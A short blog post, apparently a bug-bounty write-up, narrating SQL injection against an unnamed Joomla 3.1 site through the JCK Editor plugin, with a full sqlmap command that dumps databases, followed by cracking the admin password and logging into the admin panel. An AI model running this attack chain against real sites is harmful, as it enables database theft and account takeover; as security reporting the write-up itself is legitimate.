DEV Community

Cover image for SQL inection on
Khaled Nassar
Khaled Nassar

Posted on • Updated on

SQL inection on

Hi, this blog about SQL Injection in Allowed me to Dump all database

Full POC :

when I'm visiting this domain I've found something

First: this domain has been used an old version of Joomla CMS

let's scan it using the joomscan tool for dumping all pieces of information about Joomla (plugins, version, etc..)

All results :

Joomla Version: 3.1
Plugins: JCK Editor (6.4.4)
Enter fullscreen mode Exit fullscreen mode

searching for JCK Editor in
and I've found this exploit
let's exploit it :D

Worked ..!
you can see the version of the database :D

this is the time of SQLMAP Tool

$ sqlmap -u '' --level=5 --risk=3 --random-agent --technique=U -p parent --batch --current-db --current-user
Enter fullscreen mode Exit fullscreen mode

you can see the current user and the name of the database :)
After dumping all databases using the --all option and unencrypt the password of the admin account let's login in admin panel


You can see this video about this bug

Thanks ;0

Top comments (1)

swindlesmccoop profile image
Swindles McCoop

Thanks for sharing, this is pretty cool